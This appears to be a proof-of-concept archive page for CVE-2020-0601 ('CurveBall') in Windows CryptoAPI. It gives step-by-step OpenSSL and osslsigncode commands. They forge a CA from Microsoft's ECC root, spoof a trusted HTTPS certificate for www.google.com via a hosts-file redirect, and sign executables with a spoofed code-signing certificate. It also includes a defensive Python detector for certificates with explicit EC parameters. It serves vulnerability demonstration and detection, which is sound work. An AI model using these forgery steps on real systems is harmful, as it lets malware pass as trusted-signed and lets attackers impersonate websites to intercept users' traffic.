Related vulnerability
Title: Microsoft Windows CryptoAPI trust management vulnerability (CVE-2020-0601) Description: Microsoft Windows CryptoAPI is a cryptographic facility that Microsoft (USA) added to the Windows operating system. As an important foundation for data encryption and decryption, CryptoAPI supports synchronous and asynchronous key-based encryption as well as the management of digital certificates in the operating system. The method in Microsoft Windows CryptoAPI (Crypt32.dll) that validates Elliptic Curve Cryptography (ECC) certificates has a trust management vulnerability. An attacker can exploit it by using a spoofed code-signing certificate to sign a malicious executable. The following products and versions are affected: Micr
Description
Demonstration of CVE-2020-0601, aka CurveBall. Based on the PoCs available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall
Introduction
# Based on PoCs https://github.com/ly4k/CurveBall
# https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
# https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file
-----------------------------
# REQUIREMENTS/SOFTWARE USED
-----------------------------
python version 3.11
openssl version 3.1
osslsigncode version 2.5
python libraries used in gen-key.py and httpServer.py
-------------------------
# TLS CERTIFICATE SIGNING
-------------------------
# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf
# Create another SSL certificate (of any kind) that will be signed by the spoofed CA
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# Create a certificate signing request for the certificate
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req
# Sign the CSR using the spoofed CA certificate
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req
# Start an HTTPS server with the spoofed certificate chain
python httpServer.py
# IN WINDOWS MACHINE
# Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)
# visit HTTPS://www.google.com
# Certificate should be trusted, and 'Hello World' should be displayed
# If error occurs, check system time is correct
--------------
# CODE SIGNING
--------------
# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf
# Create a new key that can be used for code signing
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# Create a certificate signing request using the key, which we can sign
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req
# Sign the CSR using the spoofed CA
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req
# Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12
# Use the PKCS12 file to sign an executable
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe
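A defender-side check, added here as an example and not part of the PoC or its README: the spoofed CA produced by these steps carries explicit EC domain parameters in its SubjectPublicKeyInfo instead of a namedCurve OID, a shape no legitimate public CA certificate uses, so a scanner over a certificate store or captured TLS chains can flag it. Stdlib-only DER walking; the OIDs are the standard ones, and the SPKI and certificate bytes it inspects are constructed inline (placeholder point bytes, not a real key).

```python
# Flags SubjectPublicKeyInfo blocks that carry explicit EC domain parameters
# instead of a namedCurve OID, the shape a CurveBall spoofed CA has. Stdlib only.
OID_EC_PUBLIC_KEY = bytes.fromhex("2a8648ce3d0201")  # 1.2.840.10045.2.1 ecPublicKey
OID_SECP384R1 = bytes.fromhex("2b81040022")          # 1.3.132.0.34 secp384r1
OID_PRIME_FIELD = bytes.fromhex("2a8648ce3d0101")    # 1.2.840.10045.1.1 prime-field

def der_tlv(buf, pos=0):
    """Decode one DER TLV at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def der_children(value):
    """Split a constructed DER value into its (tag, value) children."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = der_tlv(value, pos)
        out.append((tag, val))
    return out

def der(tag, value):
    """Minimal DER encoder (used here only to build constructed samples)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    lb = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def ec_param_kind(spki_der):
    """Return 'namedCurve', 'explicit', 'implicit' or 'not-ec' for one SPKI."""
    fields = der_children(der_children(der_tlv(spki_der)[1])[0][1])  # AlgorithmIdentifier
    if fields[0] != (0x06, OID_EC_PUBLIC_KEY):
        return "not-ec"
    ptag = fields[1][0] if len(fields) > 1 else None
    return {0x06: "namedCurve", 0x30: "explicit"}.get(ptag, "implicit")

def cert_param_kind(cert_der):
    """Same check on a whole DER certificate (tbsCertificate.subjectPublicKeyInfo)."""
    tbs = der_children(der_children(der_tlv(cert_der)[1])[0][1])
    skip = 1 if tbs[0][0] == 0xA0 else 0  # optional [0] EXPLICIT version
    return ec_param_kind(der(*tbs[skip + 5]))

# Constructed samples: placeholder point bytes, not a real key pair.
POINT = der(0x03, b"\x00\x04" + b"\x11" * 96)
NAMED_SPKI = der(0x30, der(0x30, der(0x06, OID_EC_PUBLIC_KEY) + der(0x06, OID_SECP384R1)) + POINT)
# Explicit ECParameters SEQUENCE abbreviated to its first members (version, fieldID)
EXPLICIT_PARAMS = der(0x30, der(0x02, b"\x01") + der(0x30, der(0x06, OID_PRIME_FIELD) + der(0x02, b"\x7f")))
EXPLICIT_SPKI = der(0x30, der(0x30, der(0x06, OID_EC_PUBLIC_KEY) + EXPLICIT_PARAMS) + POINT)
```

A real scan would load each DER certificate from the store or the captured chain and treat any "explicit" result on a CA or leaf as suspect; "implicit" is also non-standard for X.509 and worth reviewing.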
File snapshot
[4.0K] /data/pocs/5c8916825a7a05bf7cafd82e629f278a53fce050
├── [4.0K] curveball
│ ├── [ 110] ca.cnf
│ ├── [ 110] ca-cs.cnf
│ ├── [4.5K] gen-key.py
│ ├── [ 855] httpServer.py
│ ├── [1.1K] MicrosoftECCProductRootCertificateAuthority.cer
│ ├── [ 336] openssl.cnf
│ ├── [ 302] openssl-cs.cnf
│ └── [2.7K] README
├── [520K] curveball-demo-steps.pdf
└── [2.7K] README.md
1 directory, 10 files
Notes
1. Accessing the original source is recommended first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating to the local POC. Thank you for your support.